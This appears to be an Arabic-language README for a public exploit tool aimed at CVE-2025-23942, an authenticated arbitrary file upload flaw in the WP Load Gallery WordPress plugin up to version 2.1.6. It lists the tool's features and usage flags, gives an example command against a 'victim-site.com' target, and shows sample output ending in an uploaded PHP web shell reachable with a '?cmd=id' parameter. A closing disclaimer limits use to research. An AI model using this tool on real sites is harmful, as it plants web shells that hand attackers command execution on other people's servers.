
WP Load Gallery <= 2.1.6 - رفع ملفات تعسفي للمستخدمين المُصادَقين (مؤلف+)
ثغرة رفع غير مقيد لملف بنوع خطير (Unrestricted Upload of File with Dangerous Type) في WP Load Gallery من NgocCode تسمح برفع Web Shell إلى خادم الويب. تؤثر هذه المشكلة على WP Load Gallery: من n/a حتى 2.1.6.
✅ استغلال آلي – يستخرج nonce، ويسجّل الدخول، ويرفع Web Shell تلقائيًا.
✅ فحص الإصدار – يتأكد مما إذا كان الهدف عرضةً للثغرة قبل الاستغلال.
✅ معالجة الأخطاء – يضمن تنفيذًا سلسًا حتى في حالة حدوث فشل.
✅ إدارة الجلسات – يستخدم إدارة جلسات دائمة للمصادقة.
✅ تغذية راجعة فورية – يوفر مخرجات في كل خطوة.
requests (pip install requests)شغّل السكربت بالمعاملات اللازمة:
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit WP Load Gallery - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
مثال:
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
_______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_
\_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____|
[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
أداة الاستغلال هذه مخصصة لأغراض تعليمية وبحوث أمنية فقط. لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام لهذا السكربت. ( Khaled_alenazi )